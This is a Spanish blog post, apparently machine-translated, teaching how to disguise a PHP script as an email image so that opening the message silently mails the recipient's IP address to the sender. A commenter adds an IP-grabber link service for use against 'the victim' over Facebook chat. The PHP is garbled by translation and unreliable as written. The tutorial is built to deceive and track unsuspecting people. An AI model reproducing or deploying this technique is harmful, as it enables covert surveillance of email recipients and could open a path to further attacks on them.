sábado, 24 de junio de 2017

Ocultar código PHP en un Email | KelvinSecurity

Ocultar código PHP en un Email | KelvinSecurity 



Ahora estaremos enviando un correo electrónico con una imagen que obtenemos de un script PHP después de ejecutar algún código.

Lo que necesitarás:
  • servidor web Apache con PHP
  • Una imagen (incluido abajo)
  • Una cuenta de correo electrónico
PASO 1 - Configuración. 



Hacer una carpeta llamada "imagen.jpg" en la carpeta html pública. En su carpeta "imagen.jpg" colocar el archivo "imagen.jpg" y el archivo "index.php".

Imagen de ejemplo:



PASO 2 - Escribir El Código

El contenido de su archivo "index.php" deben ser las siguientes

<? php // cosas a pescado aquí $ imagepath = "imagen.jpg"; $ imagen = imagecreatefromjpeg ($ imagepath); header ( 'Content-Type: image / jpeg'); imagejpeg (imagen $); ?>

Donde dice "cosas // pescado aquí" poner cualquier código de pescado que desea ejecutar:

mail ( "scriptkitty95@gmail.com", "Hax", $ _SERVER [ 'REMOTE_ADDR'] ':'.. $ _SERVER [ 'HTTP_X_FORWARDED_FOR']);
Lo que me mensajes de correo electrónico la dirección IP del usuario.
Paso 3 - Escribir el correo electrónico
Para empezar, la cumplimentación de los campos "a" y "sujetos".



Haga clic en el icono de imagen para añadir una imagen a su correo electrónico.
 


Haga clic en "Dirección web (URL)" y poner la dirección a la carpeta "imagen.jpg" no imagen. Si todo está correctamente configurado, debe aparecer la imagen y una marca de verificación.



Si todo ha ido bien debería ver su imagen en el campo del mensaje. Ahora todo lo que necesita hacer es enviar el correo electrónico y esperar a que alguien para abrirlo. 

Cómo funciona:
Cuando alguien abre el correo electrónico de su navegador ve la etiqueta de la imagen y va a " http://example.com/image.jpg " para obtener la imagen. Cuando el navegador va a " http://example.com/image.jpg " ya que es una carpeta "index.php" se ejecuta como si fueran a la página. Cuando se ejecuta "index.php" se ejecuta el código de pescado a continuación, enviar el contenido al navegador en forma de una imagen que se muestra en el correo electrónico por lo que el usuario no obtiene sospechoso.

Conclusión:
Esto se puede utilizar para obtener las direcciones IP o para hacer cosas


postby. KelvinSecurity
KelvinSecurity FaceBook [ https://www.facebook.com/Ksecureteam/ ]
KelvinSecurity [ http://ksecureteam.com/ ]


2 comentarios:

  1. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. Tambien pueden usar http://www.blasze.com y envien el link por el chat de faceb0ok para obtener el ip de la victima, saludos.

    ResponderEliminar